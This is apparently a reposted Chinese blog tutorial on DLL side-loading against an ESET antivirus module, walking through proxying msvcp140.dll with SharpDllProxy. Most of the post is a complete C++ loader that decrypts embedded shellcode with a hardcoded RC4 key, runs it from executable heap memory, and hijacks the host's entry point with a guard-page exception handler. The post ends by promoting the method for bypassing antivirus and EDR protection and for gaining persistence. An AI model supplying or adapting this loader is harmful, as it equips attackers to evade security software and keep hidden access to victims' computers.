
一种应用更广泛的DLL侧载方法

發布時間:2023/12/20 编程问答 38 豆豆

一種應用更廣泛的DLL側載方法

  • 1.尋找劫持對象
  • 2.dll側載

1.尋找劫持對象

使用ProcessMonitor查看目標程序加載dll情況
這里側載的對象是eset 32的一個模塊ecmds,側載的dll為msvcp140.dll

可以看到堆棧的情況,并沒有調用LoadLibrary函數的情況,該dll加載先于程序的入口點,原始程序加載完dll運行一段時間就會退出,因此可以在msvcp140.dll被加載后將程序入口點patch阻斷原始程序的運行流程

2.dll側載

使用SharpDllProxy將msvcp140.dll的導出函數導出到文件中,該工具會生成一個.c的文件和一個dll,這個dll就是原始的msvcp140.dll

將上面導出的函數替換到下面代碼的位置,然后編譯生成dll文件,將該dll文件重命名為msvcp140.dll

// dllmain.cpp : 定義 DLL 應用程序的入口點。 #include "pch.h"#使用SharpDllProxy到處的原始dll的導出函數HANDLE threadHandle = NULL; PVOID pmem; PVOID addr; PBYTE loaderEntryPoint; DWORD lpflOldProtect; DWORD lpflOldProtect1;unsigned char shellcode[] = {}; unsigned int len = 894;BOOL DecryptShellcode() {BOOL bSuccess = TRUE;HCRYPTKEY hCryptoKey;HCRYPTHASH hCryptHash;HCRYPTPROV hCryptoProv;DWORD dwLen = 10;unsigned char pbKey[] = "qwe123qaz?";bSuccess = CryptAcquireContextW(&hCryptoProv, NULL, L"Microsoft Enhanced RSA and AES Cryptographic Provider", PROV_RSA_AES, CRYPT_VERIFYCONTEXT);if (!bSuccess){goto CLEANUP;}bSuccess = CryptCreateHash(hCryptoProv, ((4 << 13 | (0) | 12)), 0, 0, &hCryptHash);if (!bSuccess){goto CLEANUP;}bSuccess = CryptHashData(hCryptHash, pbKey, dwLen, 0);if (!bSuccess){goto CLEANUP;}bSuccess = CryptDeriveKey(hCryptoProv, CALG_RC4, hCryptHash, 0, &hCryptoKey);if (!bSuccess){goto CLEANUP;}bSuccess = CryptDecrypt(hCryptoKey, NULL, FALSE, 0, (BYTE*)shellcode, (PDWORD)&len);if (!bSuccess){goto CLEANUP;}goto CLEANUP;CLEANUP:CryptReleaseContext(hCryptoProv, 0);CryptDestroyKey(hCryptoKey);CryptDestroyHash(hCryptHash);return bSuccess; }VOID ExecuteShellcode() {DecryptShellcode();HANDLE hHep = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);pmem = (PBYTE)HeapAlloc(hHep, 0, len);memcpy(pmem, shellcode, len);EnumChildWindows((HWND)NULL, (WNDENUMPROC)pmem, NULL);}LONG NTAPI VEH(PEXCEPTION_POINTERS pExcepInfo) {//if (pExcepInfo->ExceptionRecord->ExceptionAddress == loaderEntryPoint)if (pExcepInfo->ExceptionRecord->ExceptionCode == EXCEPTION_GUARD_PAGE) {if (pExcepInfo->ExceptionRecord->ExceptionAddress == loaderEntryPoint) {//ExecuteShellcode();VirtualProtect(loaderEntryPoint, 1, lpflOldProtect, &lpflOldProtect);//VirtualProtect(Sleep, 1, PAGE_EXECUTE_READWRITE | PAGE_GUARD, &lpflOldProtect1);WaitForSingleObjectEx(threadHandle, INFINITE, TRUE);return EXCEPTION_CONTINUE_EXECUTION;}}return EXCEPTION_CONTINUE_SEARCH; }VOID Patch() {HMODULE loaderImage = GetModuleHandleA(NULL);DWORD len = 
1;loaderEntryPoint = (PBYTE)loaderImage + *(DWORD*)((PBYTE)loaderImage + *((DWORD*)loaderImage + 15) + 40);//addr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");VirtualProtect(loaderEntryPoint, 1, PAGE_EXECUTE_READ|PAGE_GUARD, &lpflOldProtect);//_NtProtectVirtualMemory(hProc, (PVOID*)&loaderEntryPoint, (PSIZE_T)&len, PAGE_EXECUTE_READWRITE | PAGE_GUARD, &lpflOldProtect);//ExecuteShellcode();//*(loaderEntryPoint) = 0xcc;AddVectoredExceptionHandler(0, &VEH); }BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved) {switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:threadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ExecuteShellcode, NULL, 0, NULL);Patch();case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE; }

將ecmds和tmpBC2E.dll以及msvcp140.dll放在同一目錄運行,BOOM!

對edr或者殺軟的組件進行側載會有意想不到的效果,可能會繞過某些殺軟的防護
一般的,edr或者殺軟都會開機啟動,因此對這類程序的dll劫持也能夠起到很好的權限維持效果
